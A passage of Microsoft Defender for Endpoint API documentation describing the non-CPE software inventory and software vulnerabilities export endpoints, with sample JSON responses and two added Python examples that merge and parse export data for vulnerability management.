      "softwareLastSeenTimestamp": "2022-05-30 15:35:12.271"
    },
    {
      "deviceId": "6565656565",
      "rbacGroupId": 65,
      "rbacGroupName": "Center",
      "deviceName": "Device56",
      "osPlatform": "Windows10",
      "softwareVendor": "Lob Apps",
      "softwareName": "Headtrax",
      "softwareVersion": "60.273.3",
      "softwareLastSeenTimestamp": "2022-05-05 15:35:12.271"
    }
  ],
  "@odata.nextLink": "https://api.securitycenter.microsoft.com/api/machines/SoftwareInventoryNoProductCodeByMachine?pagesize=3%20%20&sincetime=2021-05-19&$skiptoken=eyJFeHBvcnREZWZpbml0aW9uIjp7IlRpbWVQYXRoIjoiMjAyMi0wNS0zMC8xMTAxLyJ9LCJFeHBvcnRGaWxlSW5kZXgiOjAsIkxpbmVTdG9wcGVkQXQiOjV9"
}
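Both this article and the Export software inventory assessment article above say that the CPE and non-CPE exports together give full visibility of installed software, and that non-CPE products carry no weakness or end-of-support data. The following Python is an added example, not code from the Microsoft documentation, that merges rows from both APIs into one per-device inventory keyed the way the APIs key their rows (DeviceId plus SoftwareVendor, SoftwareName, SoftwareVersion), then produces three views a vulnerability-management owner typically wants: end-of-support software, weakness totals per device, and how many installed products per device the service cannot assess at all. The sample rows are constructed from values in the two response examples; the device ids are invented, and the hasCpe field is this example's own marker, not an API property.

```python
from collections import defaultdict
from typing import Dict, Iterable, List, Tuple

SoftwareKey = Tuple[str, str, str]  # (vendor, name, version): the row identity both APIs use


def software_key(record: dict) -> SoftwareKey:
    """Key a row by SoftwareVendor, SoftwareName, SoftwareVersion (vendor and name case-folded)."""
    return (record["softwareVendor"].lower(), record["softwareName"].lower(), record["softwareVersion"])


def merge_inventory(cpe_records: Iterable[dict], non_cpe_records: Iterable[dict]) -> Dict[str, List[dict]]:
    """Combine the CPE and non-CPE exports into one per-device inventory.

    CPE rows carry numberOfWeaknesses and end-of-support fields; non-CPE rows carry neither,
    so they are tagged hasCpe=False (this example's own marker) with numberOfWeaknesses=None,
    which keeps 'not assessed' distinct from 'assessed, zero weaknesses' in any report.
    """
    inventory: Dict[str, Dict[SoftwareKey, dict]] = defaultdict(dict)
    for r in cpe_records:
        inventory[r["deviceId"]][software_key(r)] = {**r, "hasCpe": True}
    for r in non_cpe_records:
        # setdefault: if the same product were ever reported by both APIs, the assessed row wins
        inventory[r["deviceId"]].setdefault(
            software_key(r), {**r, "hasCpe": False, "numberOfWeaknesses": None, "endOfSupportStatus": "None"}
        )
    return {device: list(rows.values()) for device, rows in inventory.items()}


def eos_findings(inventory: Dict[str, List[dict]]) -> List[Tuple[str, str, str]]:
    """(deviceId, softwareName, endOfSupportStatus) for every row whose status is not 'None'."""
    findings = []
    for device, rows in inventory.items():
        for row in rows:
            status = row.get("endOfSupportStatus") or "None"
            if status != "None":
                findings.append((device, row["softwareName"], status))
    return sorted(findings)


def weaknesses_per_device(inventory: Dict[str, List[dict]]) -> Dict[str, int]:
    """Sum of numberOfWeaknesses over assessed (CPE) software on each device."""
    return {device: sum(row["numberOfWeaknesses"] or 0 for row in rows) for device, rows in inventory.items()}


def unassessed_per_device(inventory: Dict[str, List[dict]]) -> Dict[str, int]:
    """Installed products per device that vulnerability management cannot assess (no CPE)."""
    return {device: sum(1 for row in rows if not row["hasCpe"]) for device, rows in inventory.items()}


# Constructed sample rows; field values follow the two response examples, device ids are invented.
CPE_ROWS = [
    {"deviceId": "dev-1", "softwareVendor": "microsoft", "softwareName": "windows_10",
     "softwareVersion": "10.0.17763.1637", "numberOfWeaknesses": 58,
     "endOfSupportStatus": "Upcoming EOS Version", "endOfSupportDate": "2021-05-11T00:00:00+00:00"},
    {"deviceId": "dev-1", "softwareVendor": "microsoft", "softwareName": ".net_framework",
     "softwareVersion": "4.0.0.0", "numberOfWeaknesses": 0,
     "endOfSupportStatus": "None", "endOfSupportDate": None},
]
NON_CPE_ROWS = [
    {"deviceId": "dev-1", "softwareVendor": "Lob Apps", "softwareName": "Headtrax",
     "softwareVersion": "60.273.3", "softwareLastSeenTimestamp": "2022-05-05 15:35:12.271"},
    {"deviceId": "dev-2", "softwareVendor": "intel", "softwareName": "intel®_software_installer",
     "softwareVersion": "22.20.2.2", "softwareLastSeenTimestamp": "2022-05-30 15:35:12.271"},
]


def sample_inventory() -> Dict[str, List[dict]]:
    """Merged inventory built from the constructed rows."""
    return merge_inventory(CPE_ROWS, NON_CPE_ROWS)


if __name__ == "__main__":
    inv = sample_inventory()
    print("end-of-support:", eos_findings(inv))
    print("weaknesses per device:", weaknesses_per_device(inv))
    print("unassessed (no CPE) per device:", unassessed_per_device(inv))
```

On the constructed rows, dev-1 has one end-of-support finding (windows_10, Upcoming EOS Version), 58 weaknesses, and one product the service cannot assess; dev-2 has no weaknesses on record but also only an unassessed product, which is the case the count of non-CPE software is meant to surface rather than leave invisible behind a zero.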

2. Export non product code software inventory assessment (via files)

2.1 API method description

This API response contains all the data of installed software that does not have a Common Platform Enumeration (CPE) per device. Returns a table with an entry for every unique combination of DeviceId, SoftwareVendor, SoftwareName, SoftwareVersion.

2.1.1 Limitations
Rate limitations for this API are 5 calls per minute and 20 calls per hour.

2.2 Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs for details.

Permission type | Permission | Permission display name
Application | Software.Read.All | 'Read Threat and Vulnerability Management software information'
Delegated (work or school account) | Software.Read | 'Read Threat and Vulnerability Management software information'

2.3 URL
HTTP

GET /api/machines/SoftwareInventoryNonCpeExport

2.4 Parameters
sasValidHours: The number of hours that the download URLs will be valid for (maximum 24 hours).

2.5 Properties

7 Note

The files are gzip compressed and in multiline JSON format.
By default, the download URLs are only valid for 3 hours; use the sasValidHours parameter to change this.
For maximum download speed, make sure you are downloading from the same Azure region in which your data resides.

Property (ID) | Data type | Description | Example of a returned value
Export files | array[string] | A list of download URLs for files holding the current snapshot of the organization. | ["https://tvmexportstrstgeus.blob.core.windows.net/tvm-export...1", "https://tvmexportstrstgeus.blob.core.windows.net/tvm-export...2"]
GeneratedTime | string | The time that the export was generated. | 2021-05-20T08:00:00Z

2.6 Examples

2.6.1 Request example

HTTP

GET https://api.securitycenter.microsoft.com/api/machines/SoftwareInventoryNonCpeExport

2.6.2 Response example

JSON

{
"@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#microsoft.windowsDefenderATP.api.ExportFilesResponse",
"exportFiles": [
"https://tvmexportexternalprdcanc.blob.core.windows.net/temp-ffd80447-7b3d-4ad2-b366-f0979b129662/2022-05-30/1101/NonCpeSoftwareInventory/json/OrgId=47d41a0c-188d-46d3-bbea-a93dbc0bfcaa/_RbacGroupId=1/part-00337-5e15412b-5c85-4896-ac60-b7b3ab8da096.c000.json.gz?sv=2020-08-04&st=2022-05-30T13%3A41%3A59Z&se=2022-05-30T16%3A41%3A59Z&sr=b&sp=r&sig=aHnmuOKlIvpR0PsdamYfmCCDZ1nhpuXBzK2%2FkJ9xTpg%3D",
"https://tvmexportexternalprdcanc.blob.core.windows.net/temp-ffd80447-7b3d-4ad2-b366-f0979b129662/2022-05-30/1101/NonCpeSoftwareInventory/json/OrgId=47d41a0c-188d-46d3-bbea-a93dbc0bfcaa/_RbacGroupId=1/part-00338-5e15412b-5c85-4896-ac60-b7b3ab8da096.c000.json.gz?sv=2020-08-04&st=2022-05-30T13%3A41%3A59Z&se=2022-05-30T16%3A41%3A59Z&sr=b&sp=r&sig=0fQg%2Ft469x26KvPLmvctLl0g6DC38CNM3lXYi9dnFfo%3D",
"https://tvmexportexternalprdcanc.blob.core.windows.net/temp-ffd80447-7b3d-4ad2-b366-f0979b129662/2022-05-30/1101/NonCpeSoftwareInventory/json/OrgId=47d41a0c-188d-46d3-bbea-a93dbc0bfcaa/_RbacGroupId=1/part-00339-5e15412b-5c85-4896-ac60-b7b3ab8da096.c000.json.gz?sv=2020-08-04&st=2022-05-30T13%3A41%3A59Z&se=2022-05-30T16%3A41%3A59Z&sr=b&sp=r&sig=P6HGHoLXXipMauBpLueoQVrwHL7qmvLoCjcij6ERx8o%3D",
"https://tvmexportexternalprdcanc.blob.core.windows.net/temp-ffd80447-7b3d-4ad2-b366-f0979b129662/2022-05-30/1101/NonCpeSoftwareInventory/json/OrgId=47d41a0c-188d-46d3-bbea-a93dbc0bfcaa/_RbacGroupId=1/part-00340-5e15412b-5c85-4896-ac60-b7b3ab8da096.c000.json.gz?sv=2020-08-04&st=2022-05-30T13%3A41%3A59Z&se=2022-05-30T16%3A41%3A59Z&sr=b&sp=r&sig=VnpVct%2F8vdiIFTf2xXP9DF7ngWv1Zqew30q2jBPVghg%3D",
"https://tvmexportexternalprdcanc.blob.core.windows.net/temp-ffd80447-7b3d-4ad2-b366-f0979b129662/2022-05-30/1101/NonCpeSoftwareInventory/json/OrgId=47d41a0c-188d-46d3-bbea-a93dbc0bfcaa/_RbacGroupId=1/part-00341-5e15412b-5c85-4896-ac60-b7b3ab8da096.c000.json.gz?sv=2020-08-04&st=2022-05-30T13%3A41%3A59Z&se=2022-05-30T16%3A41%3A59Z&sr=b&sp=r&sig=GY0zxMfEmr9v9fZBWYyKEtT2k%2F0ELQIlOP0ct%2B6SdGU%3D"
],
"generatedTime": "2022-05-30T11:01:00Z"
}

See also
Export software assessment per device
Export assessment methods and properties per device
Export secure configuration assessment per device
Export software vulnerabilities assessment per device

Other related

Microsoft Defender Vulnerability Management


Vulnerabilities in your organization

Tip
Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.


Export software vulnerabilities assessment per device
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Vulnerability Management
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Returns all known software vulnerabilities and their details for all devices, on a per-device basis.

Different API calls get different types of data. Because the amount of data can be large, there are two ways it can be retrieved:

1. Export software vulnerabilities assessment (JSON response): The API pulls all data in your organization as JSON responses. This method
is best for small organizations with fewer than 100K devices. The response is paginated, so you can use the @odata.nextLink field from
the response to fetch the next results.

2. Export software vulnerabilities assessment (via files): This API solution enables pulling larger amounts of data faster and more reliably.
The via-files method is recommended for large organizations with more than 100K devices. This API pulls all data in your organization as
download files. The response contains URLs to download all the data from Azure Storage. This API enables you to download all your
data from Azure Storage as follows:

Call the API to get a list of download URLs with all your organization's data.
Download all the files using the download URLs and process the data as you like.

3. Delta export software vulnerabilities assessment (JSON response): Returns a table with an entry for every unique combination of
DeviceId, SoftwareVendor, SoftwareName, SoftwareVersion, CveId, and EventTimestamp. The API pulls data in your organization as
JSON responses. The response is paginated, so you can use the @odata.nextLink field from the response to fetch the next results.

The full "software vulnerabilities assessment (JSON response)" is used to obtain an entire snapshot of the software vulnerabilities
assessment of your organization by device. The delta export API call, by contrast, is used to fetch only the changes that have happened
between a selected date and the current date (the "delta" API call). Instead of getting a full export with a large amount of data every
time, you only get specific information on new, fixed, and updated vulnerabilities. The delta export JSON response API call can also be
used to calculate different KPIs such as "how many vulnerabilities were fixed?" or "how many new vulnerabilities were added to my
organization?"

Because the delta export JSON response API call for software vulnerabilities returns data for only a targeted date range, it isn't
considered a full export.

Data that is collected (using either the JSON response or via files) is the current snapshot of the current state. It doesn't contain historic data. To
collect historic data, customers must save the data in their own data storage.

7 Note

Unless indicated otherwise, all export assessment methods listed are full export and by device (also referred to as per device).

1. Export software vulnerabilities assessment (JSON response)

1.1 API method description

This API response contains all the data of installed software per device. It returns a table with an entry for every unique combination of
DeviceId, SoftwareVendor, SoftwareName, SoftwareVersion, and CveId.

1.1.1 Limitations
Maximum page size is 200,000.
Rate limitations for this API are 30 calls per minute and 1000 calls per hour.

1.2 Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions, see Use Microsoft
Defender for Endpoint APIs for details.

Permission type Permission Permission display name

Application Vulnerability.Read.All 'Read Threat and Vulnerability Management vulnerability information'

Delegated (work or school account) Vulnerability.Read 'Read Threat and Vulnerability Management vulnerability information'

1.3 URL
HTTP

GET /api/machines/SoftwareVulnerabilitiesByMachine

1.4 Parameters
pageSize (default = 50,000): Number of results in response.
$top: Number of results to return (doesn't return @odata.nextLink and so doesn't pull all the data).

1.5 Properties

7 Note

Each record is approximately 1 KB of data. Take this into account when choosing the pageSize value that suits you.
Some additional columns might be returned in the response. These columns are temporary and might be removed; use
only the documented columns.
The properties defined in the following table are listed alphabetically, by property ID. When running this API, the resulting output
will not necessarily be returned in the same order listed in this table.

Property (ID) | Data type | Description | Example of a returned value
CveId | String | Unique identifier assigned to the security vulnerability under the Common Vulnerabilities and Exposures (CVE) system. | CVE-2020-15992
CvssScore | String | The CVSS score of the CVE. | 6.2
DeviceId | String | Unique identifier for the device in the service. | 9eaf3a8b5962e0e6b1af9ec756664a9b823df2d1
DeviceName | String | Fully qualified domain name (FQDN) of the device. | johnlaptop.europe.contoso.com
DiskPaths | Array[string] | Disk evidence that the product is installed on the device. | ["C:\Program Files (x86)\Microsoft\Silverlight\Application\silverlight.exe"]
ExploitabilityLevel | String | The exploitability level of this vulnerability (NoExploit, ExploitIsPublic, ExploitIsVerified, ExploitIsInKit). | ExploitIsInKit
FirstSeenTimestamp | String | First time this product CVE was seen on the device. | 2020-11-03 10:13:34.8476880
Id | String | Unique identifier for the record. | 123ABG55_573AG&mnp!
LastSeenTimestamp | String | Last time the software vulnerability was seen on the device. | 2020-11-03 10:13:34.8476880
OSPlatform | String | Platform of the operating system running on the device. This property indicates specific operating systems with variations within the same family, such as Windows 10 and Windows 11. See Microsoft Defender Vulnerability Management supported operating systems and platforms for details. | Windows10 and Windows 11
RbacGroupName | String | The role-based access control (RBAC) group. If this device isn't assigned to any RBAC group, the value will be "Unassigned." If the organization doesn't contain any RBAC groups, the value will be "None." | Servers
RecommendationReference | String | A reference to the recommendation ID related to this software. | va--microsoft--silverlight
RecommendedSecurityUpdate (optional) | String | Name or description of the security update provided by the software vendor to address the vulnerability. | April 2020 Security Updates
RecommendedSecurityUpdateId (optional) | String | Identifier of the applicable security updates or identifier for the corresponding guidance or knowledge base (KB) articles. | 4550961
RegistryPaths | Array[string] | Registry evidence that the product is installed in the device. | ["HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Unin
SecurityUpdateAvailable | Boolean | Indicates whether a security update is available for the software. | Possible values are true or false.
SoftwareName | String | Name of the software product. | Chrome
SoftwareVendor | String | Name of the software vendor. | Google
SoftwareVersion | String | Version number of the software product. | 81.0.4044.138
VulnerabilitySeverityLevel | String | Severity level assigned to the security vulnerability based on the CVSS score. | Medium

1.6 Examples

1.6.1 Request example

HTTP

GET https://api.securitycenter.microsoft.com/api/machines/SoftwareVulnerabilitiesByMachine?pageSize=5

1.6.2 Response example

JSON

{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Collection(microsoft.windowsDefenderATP.api.AssetVulnerability)",
"value": [
{
"id": "00044f612345baf759462dbe6db733b6a9c59ab4_edge_10.0.17763.1637__",
"deviceId": "00044f612345daf756462bde6bd733b9a9c59ab4",
"rbacGroupName": "hhh",
"deviceName": "ComputerPII_18663b45912eed224b2de2f5ea3142726e63f16a.DomainPII_21eeb80d089e79bdfa178eabfa25e8de9acfa346.corp.contoso.com",
"osPlatform": "Windows10",
"osVersion": "10.0.17763.1637",
"osArchitecture": "x64",
"softwareVendor": "microsoft",
"softwareName": "edge",
"softwareVersion": "10.0.17763.1637",
"cveId": null,
"vulnerabilitySeverityLevel": null,
"recommendedSecurityUpdate": null,
"recommendedSecurityUpdateId": null,
"recommendedSecurityUpdateUrl": null,
"diskPaths": [],
"registryPaths": [],
"lastSeenTimestamp": "2020-12-30 14:17:26",
"firstSeenTimestamp": "2020-12-30 11:07:15",
"exploitabilityLevel": "NoExploit",
"recommendationReference": "va-_-microsoft-_-edge",
"securityUpdateAvailable": true
},
{
"id": "00044f912345baf756462bde6db733b9a9c56ad4_.net_framework_4.0.0.0__",
"deviceId": "00044f912345daf756462bde6db733b6a9c59ad4",
"rbacGroupName": "hhh",
"deviceName": "ComputerPII_18663b45912eed224b2be2f5ea3142726e63f16a.DomainPII_21eeb80b086e79bdfa178eabfa25e8de6acfa346.corp.contoso.com",
"osPlatform": "Windows10",
"osVersion": "10.0.17763.1637",
"osArchitecture": "x64",
"softwareVendor": "microsoft",
"softwareName": ".net_framework",
"softwareVersion": "4.0.0.0",
"cveId": null,
"vulnerabilitySeverityLevel": null,
"recommendedSecurityUpdate": null,
"recommendedSecurityUpdateId": null,
"recommendedSecurityUpdateUrl": null,
"diskPaths": [],
"registryPaths": [
"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4.0\\Client\\Install"
],
"lastSeenTimestamp": "2020-12-30 13:18:33",
"firstSeenTimestamp": "2020-12-30 11:07:15",
"exploitabilityLevel": "NoExploit",
"recommendationReference": "va-_-microsoft-_-.net_framework",
"securityUpdateAvailable": true
},
{
"id": "00044f912345baf756462dbe6db733d6a9c59ab4_system_center_2012_endpoint_protection_4.10.209.0__",
"deviceId": "00044f912345daf756462bde6db733b6a9c59ab4",
"rbacGroupName": "hhh",
"deviceName": "ComputerPII_18663b45912eed224b2be2f5ea3142726e63f16a.DomainPII_21eed80b089e79bdfa178eadfa25e8be6acfa346.corp.contoso.com",
"osPlatform": "Windows10",
"osVersion": "10.0.17763.1637",
"osArchitecture": "x64",
"softwareVendor": "microsoft",
"softwareName": "system_center_2012_endpoint_protection",
"softwareVersion": "4.10.209.0",
"cveId": null,
"vulnerabilitySeverityLevel": null,
"recommendedSecurityUpdate": null,
"recommendedSecurityUpdateId": null,
"recommendedSecurityUpdateUrl": null,
"diskPaths": [],
"registryPaths": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Microsoft Security Client"
],
"lastSeenTimestamp": "2020-12-30 14:17:26",
"firstSeenTimestamp": "2020-12-30 11:07:15",
"exploitabilityLevel": "NoExploit",
"recommendationReference": "va-_-microsoft-_-system_center_2012_endpoint_protection",
"securityUpdateAvailable": true
},
{
"id": "00044f612345bdaf759462dbe6bd733b6a9c59ab4_onedrive_20.245.1206.2__",
"deviceId": "00044f91234daf759492dbe6bd733b6a9c59ab4",
"rbacGroupName": "hhh",
"deviceName": "ComputerPII_189663d45612eed224b2be2f5ea3142729e63f16a.DomainPII_21eed80b086e79bdfa178eadfa25e8de6acfa346.corp.contoso.com",
"osPlatform": "Windows10",
"osVersion": "10.0.17763.1637",
"osArchitecture": "x64",
"softwareVendor": "microsoft",
"softwareName": "onedrive",
"softwareVersion": "20.245.1206.2",
"cveId": null,
"vulnerabilitySeverityLevel": null,
"recommendedSecurityUpdate": null,
"recommendedSecurityUpdateId": null,
"recommendedSecurityUpdateUrl": null,
"diskPaths": [],
"registryPaths": [
"HKEY_USERS\\S-1-5-21-2944539346-1310925172-2349113062-1001\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\OneDriveSetup.exe"
],
"lastSeenTimestamp": "2020-12-30 13:18:33",
"firstSeenTimestamp": "2020-12-30 11:07:15",
"exploitabilityLevel": "NoExploit",
"recommendationReference": "va-_-microsoft-_-onedrive",
"securityUpdateAvailable": true
},
{
"id": "00044f912345daf759462bde6db733b6a9c56ab4_windows_10_10.0.17763.1637__",
"deviceId": "00044f912345daf756462dbe6db733d6a9c59ab4",
"rbacGroupName": "hhh",
"deviceName": "ComputerPII_18663b45912eeb224d2be2f5ea3142729e63f16a.DomainPII_21eeb80d086e79bdfa178eadfa25e8de6acfa346.corp.contoso.com",
"osPlatform": "Windows10",
"osVersion": "10.0.17763.1637",
"osArchitecture": "x64",
"softwareVendor": "microsoft",
"softwareName": "windows_10",
"softwareVersion": "10.0.17763.1637",
"cveId": null,
"vulnerabilitySeverityLevel": null,
"recommendedSecurityUpdate": null,
"recommendedSecurityUpdateId": null,
"recommendedSecurityUpdateUrl": null,
"diskPaths": [],
"registryPaths": [],
"lastSeenTimestamp": "2020-12-30 14:17:26",
"firstSeenTimestamp": "2020-12-30 11:07:15",
"exploitabilityLevel": "NoExploit",
"recommendationReference": "va-_-microsoft-_-windows_10",
"securityUpdateAvailable": true
}
],
"@odata.nextLink": "https://api.securitycenter.microsoft.com/api/machines/SoftwareVulnerabilitiesByMachine?pagesize=5&$skiptoken=eyJFeHBvcnREZWZpbml0aW9uIjp7IlRpbWVQYXRoIjoiMjAyMS0wMS0xMS8xMTAxLyJ9LCJFeHBvcnRGaWxlSW5kZXgiOjAsIkxpbmVTdG9wcGVkQXQiOjV9"
}

2. Export software vulnerabilities assessment (via files)

2.1 API method description

This API response contains all the data of installed software per device. It returns a table with an entry for every unique combination of
DeviceId, SoftwareVendor, SoftwareName, SoftwareVersion, and CveId.

2.1.1 Limitations
Rate limitations for this API are 5 calls per minute and 20 calls per hour.

2.2 Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions, see Use Microsoft
Defender for Endpoint APIs for details.

Permission type Permission Permission display name

Application Vulnerability.Read.All 'Read Threat and Vulnerability Management vulnerability information'

Delegated (work or school account) Vulnerability.Read 'Read Threat and Vulnerability Management vulnerability information'

2.3 URL
HTTP

GET /api/machines/SoftwareVulnerabilitiesExport

2.4 Parameters
sasValidHours: The number of hours that the download URLs will be valid for (Maximum 24 hours).

2.5 Properties

7 Note

The files are gzip compressed and in multiline JSON format.

By default, the download URLs are only valid for 3 hours; use the sasValidHours parameter to change this.

For maximum download speed, make sure you are downloading from the same Azure region in which your data resides.

Each record is approximately 1 KB of data. Take this into account when choosing the pageSize value that suits you.

Some additional columns might be returned in the response. These columns are temporary and might be removed; use
only the documented columns.

Property (ID) | Data type | Description | Example of a returned value
Export files | array[string] | A list of download URLs for files holding the current snapshot of the organization. | ["https://tvmexportstrstgeus.blob.core.windows.net/tvm-export...1", "https://tvmexportstrstgeus.blob.core.windows.net/tvm-export...2"]
GeneratedTime | String | The time that the export was generated. | 2021-05-20T08:00:00Z

2.6 Examples

2.6.1 Request example

HTTP

GET https://api-us.securitycenter.contoso.com/api/machines/SoftwareVulnerabilitiesExport

2.6.2 Response example

JSON

{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#microsoft.windowsDefenderATP.api.ExportFilesResponse",
"exportFiles": [
"https://tvmexportstrstgeus.blob.core.windows.net/tvm-export/2021-01-11/1101/VaExport/json/OrgId=12345678-195f-4223-9c7a-99fb420fd000/part-00393-bcc26c4f-e531-48db-9892-c93ac5d72d5c.c000.json.gz?sv=2019-12-12&st=2021-01-11T11%3A35%3A13Z&se=2021-01-11T14%3A35%3A13Z&sr=b&sp=r&sig=...",
"https://tvmexportstrstgeus.blob.core.windows.net/tvm-export/2021-01-11/1101/VaExport/json/OrgId=12345678-195f-4223-9c7a-99fb420fd000/part-00393-bcc26c4f-e531-48db-9892-c93ac5d72d5c.c001.json.gz?sv=2019-12-12&st=2021-01-11T11%3A35%3A13Z&se=2021-01-11T14%3A35%3A13Z&sr=b&sp=r&sig=...",
"https://tvmexportstrstgeus.blob.core.windows.net/tvm-export/2021-01-11/1101/VaExport/json/OrgId=12345678-195f-4223-9c7a-99fb420fd000/part-00393-bcc26c4f-e531-48db-9892-c93ac5d72d5c.c002.json.gz?sv=2019-12-12&st=2021-01-11T11%3A35%3A13Z&se=2021-01-11T14%3A35%3A13Z&sr=b&sp=r&sig=..."
],
"generatedTime": "2021-01-11T11:01:00Z"
}
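The via-files response above (and the non-CPE software inventory one earlier on this page) is consumed the same way: check each SAS URL's expiry before downloading, then read the gzip-compressed multiline JSON file line by line. The following is an added example, not Microsoft's code or an official client; the export URLs and records are constructed in memory, the `sig` values are placeholders, and nothing is fetched from the network.

```python
"""Consume a Defender for Endpoint 'via files' export response (added example)."""
import gzip
import io
import json
from datetime import datetime, timedelta, timezone
from urllib.parse import parse_qs, urlparse


def parse_utc(stamp: str) -> datetime:
    """Parse a 'YYYY-MM-DDTHH:MM:SSZ' timestamp into an aware UTC datetime."""
    return datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def sas_expiry(url: str) -> datetime:
    """Return the expiry encoded in the SAS 'se' query parameter of an export URL.

    The links are valid for a limited window (3 hours by default, up to 24 with
    sasValidHours); 'se' is the authoritative expiry for that specific link.
    parse_qs decodes the %3A escapes seen in the documented example URLs.
    """
    return parse_utc(parse_qs(urlparse(url).query)["se"][0])


def usable_urls(export_response: dict, now: datetime,
                margin: timedelta = timedelta(minutes=5)) -> list:
    """Keep only export URLs that will still be valid 'margin' from now.

    Azure Storage rejects an expired SAS URL (HTTP 403), so once a link has
    lapsed the export API must be called again for fresh URLs; retrying the
    same download does not help.
    """
    return [u for u in export_response["exportFiles"] if sas_expiry(u) - margin > now]


def iter_records(gz_bytes: bytes):
    """Yield one record per line from a gzip-compressed multiline JSON file.

    'Multiline JSON' means one JSON object per line (JSON Lines), so the file
    is parsed line by line; a single json.load() on the whole file would fail.
    """
    with gzip.open(io.BytesIO(gz_bytes), "rt", encoding="utf-8") as fh:
        for line in fh:
            line = line.strip()
            if line:
                yield json.loads(line)


def vulnerabilities_per_device(gz_bytes: bytes) -> dict:
    """Count records that carry a cveId, keyed by deviceId.

    Rows with cveId == null describe installed software with no known CVE
    (the documented response example contains several); they are skipped so
    the count reflects exposure rather than inventory size.
    """
    counts: dict = {}
    for rec in iter_records(gz_bytes):
        if rec.get("cveId"):
            counts[rec["deviceId"]] = counts.get(rec["deviceId"], 0) + 1
    return counts


# ---- constructed sample data (hypothetical; not from a real tenant) --------
SAMPLE_RESPONSE = {
    "exportFiles": [
        "https://tvmexportstrstgeus.blob.core.windows.net/tvm-export/part-00393.c000.json.gz"
        "?sv=2019-12-12&st=2021-01-11T11%3A35%3A13Z&se=2021-01-11T14%3A35%3A13Z&sr=b&sp=r&sig=PLACEHOLDER",
        "https://tvmexportstrstgeus.blob.core.windows.net/tvm-export/part-00393.c001.json.gz"
        "?sv=2019-12-12&st=2021-01-11T11%3A35%3A13Z&se=2021-01-11T12%3A00%3A00Z&sr=b&sp=r&sig=PLACEHOLDER",
    ],
    "generatedTime": "2021-01-11T11:01:00Z",
}

# The shape of one line in an exported file, trimmed to the fields used here.
SAMPLE_RECORDS = [
    {"deviceId": "dev-a", "softwareName": "chrome", "softwareVersion": "81.0.4044.138", "cveId": "CVE-2020-16011"},
    {"deviceId": "dev-a", "softwareName": "firefox", "softwareVersion": "83.0.0.0", "cveId": "CVE-2020-26971"},
    {"deviceId": "dev-a", "softwareName": "onedrive", "softwareVersion": "20.64.329.3", "cveId": None},
    {"deviceId": "dev-b", "softwareName": "chrome", "softwareVersion": "81.0.4044.138", "cveId": "CVE-2020-16011"},
]


def build_sample_file() -> bytes:
    """Produce the gzip-compressed JSON Lines bytes an export file would contain."""
    body = "\n".join(json.dumps(r) for r in SAMPLE_RECORDS) + "\n"
    return gzip.compress(body.encode("utf-8"))


if __name__ == "__main__":
    now = parse_utc("2021-01-11T11:56:00Z")
    print("usable URLs:", len(usable_urls(SAMPLE_RESPONSE, now)))  # 1: the second link expires at 12:00
    print(vulnerabilities_per_device(build_sample_file()))        # {'dev-a': 2, 'dev-b': 1}
```

Because each export is a snapshot without history, a job that runs this daily should also persist the records together with the response's generatedTime if trend data is needed later.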

3. Delta export software vulnerabilities assessment (JSON response)

3.1 API method description


Returns a table with an entry for every unique combination of DeviceId, SoftwareVendor, SoftwareName, SoftwareVersion, and CveId. The API
pulls data in your organization as JSON responses. The response is paginated, so you can use the @odata.nextLink field from the response
to fetch the next results. Unlike the full software vulnerabilities assessment (JSON response), which is used to obtain an entire snapshot of
the software vulnerabilities assessment of your organization by device, the delta export JSON response API call is used to fetch only the
changes that have happened between a selected date and the current date (the "delta" API call). Instead of getting a full export with a large
amount of data every time, you only get specific information on new, fixed, and updated vulnerabilities. The delta export JSON response API
call can also be used to calculate different KPIs such as "how many vulnerabilities were fixed?" or "how many new vulnerabilities were
added to my organization?"

7 Note

It's highly recommended that you use the full export software vulnerabilities assessment by device API call at least once a week, and this
additional export software vulnerabilities changes by device (delta) API call on all the other days of the week. Unlike the other
assessment JSON response APIs, the "delta export" is not a full export. The delta export includes only the changes that have
happened between a selected date and the current date (the "delta" API call).

3.1.1 Limitations

Maximum page size is 200,000.
The sinceTime parameter has a maximum of 14 days.
Rate limitations for this API are 30 calls per minute and 1000 calls per hour.

3.2 Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions, see Use Microsoft
Defender for Endpoint APIs for details.

Permission type Permission Permission display name

Application Vulnerability.Read.All 'Read Threat and Vulnerability Management vulnerability information'

Delegated (work or school account) Vulnerability.Read 'Read Threat and Vulnerability Management vulnerability information'

3.3 URL
HTTP

GET /api/machines/SoftwareVulnerabilityChangesByMachine

3.4 Parameters
sinceTime (required): The start time from which you want to see data changes. Vulnerability management generates data on new and
updated vulnerabilities every 6 hours. The data returned includes all the changes captured in the 6-hour period the specified
sinceTime falls into, along with the changes in any subsequent 6-hour periods up to and including the most recently generated data.
pageSize (default = 50,000): number of results in response.
$top: number of results to return (doesn't return @odata.nextLink and so doesn't pull all the data).

3.5 Properties
Each returned record contains all the data from the full export software vulnerabilities assessment by device API, plus two more fields:
EventTimestamp and Status.
7 Note

Some additional columns might be returned in the response. These columns are temporary and might be removed, so please use
only the documented columns.
The properties defined in the following table are listed alphabetically, by property ID. When running this API, the resulting output
will not necessarily be returned in the same order listed in this table.

Property (ID) | Data type | Description | Example of returned value
CveId | String | Unique identifier assigned to the security vulnerability under the Common Vulnerabilities and Exposures (CVE) system. | CVE-2020-15992
CvssScore | String | The CVSS score of the CVE. | 6.2
